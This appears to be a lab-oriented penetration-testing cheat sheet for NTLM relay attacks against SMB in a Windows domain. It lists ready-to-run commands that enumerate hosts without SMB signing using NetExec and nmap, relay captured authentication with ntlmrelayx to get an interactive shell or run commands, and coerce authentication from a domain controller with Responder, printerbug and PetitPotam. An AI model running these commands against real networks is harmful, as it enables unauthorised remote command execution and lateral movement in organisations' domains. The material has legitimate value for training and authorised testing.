SMB signing decides whether classic NTLM relay to SMB is viable. If SMB signing is required on the target, NTLM relay to that SMB service fails. If signing is not required and the relayed identity is local admin, relay can become command execution.
Check signing with NetExec
nxc smb 10.10.10.0/24
nxc smb 10.10.10.0/24 -u student -p 'student'
nxc smb 10.10.10.0/24 -u student -p 'student' --gen-relay-list smb-relay-targets.txt
cat smb-relay-targets.txt
Check signing with nmap
nmap -p445 --script smb2-security-mode 10.10.10.0/24
Relay to one SMB target
ntlmrelayx.py -t smb://web01.ootw.local -smb2support -i
Connect to relay shell
nc 127.0.0.1 11000
Relay command
ntlmrelayx.py -t smb://web01.ootw.local -smb2support -c 'whoami /all'
Relay to target list
ntlmrelayx.py -tf smb-relay-targets.txt -smb2support -i
Trigger examples
sudo responder -I eth0
printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100
PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200
Notes
- SMB signing blocks relay to SMB, not authentication to SMB.
- A valid password, hash, or Kerberos ticket can still authenticate normally if the account is allowed.